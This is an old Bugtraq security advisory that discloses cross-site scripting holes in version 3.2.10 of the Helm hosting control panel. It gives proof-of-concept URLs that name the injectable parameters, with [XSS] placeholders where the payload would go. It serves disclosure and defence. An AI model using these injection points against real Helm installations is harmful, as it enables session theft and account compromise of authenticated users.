
Date: 14 Nov 2006 23:39:54 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Helm Cross-Site Scripting (XSS)

#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory : http://aria-security.net/advisory/helm.txt
#-----------------------------------------------------------
#Software: Helm  
#Version: Version 3.2.10

# As a resller and as Admin : 
#PoC
	http://target/[path]/domains.asp?txtDomainName=[XSS]%21&btnSubmit.x=0&btnSubmit.y=0
	http://target/[path]/users.asp?SKey=AKU7ACC552W25EA4E8RPBYP67D7EB6RAAJPM8XKA&txtCompanyName=[XSS]&btnSubmit.x=0&btnSubmit.y=0
	http://target/[path]/users.asp?txtEmail=[XSS]&btnSubmit.x=0&btnSubmit.y=0
	http://target/[path]users.asp?txtUserAccNum=[XSS]&btnSubmit.x=0&btnSubmit.y=0
	http://terget/[path]/default.asp?setThemeColour=[XSS]
	
#As a User
#PoC
	http://terget/[path]/default.asp?setThemeColour=[XSS]
	http://target/[path]/domains.asp?txtDomainName=[XSS]%21&btnSubmit.x=0&btnSubmit.y=0#


#P.S : Attacker must be authenticated
#
#Contact: Advisory@...a-security.net
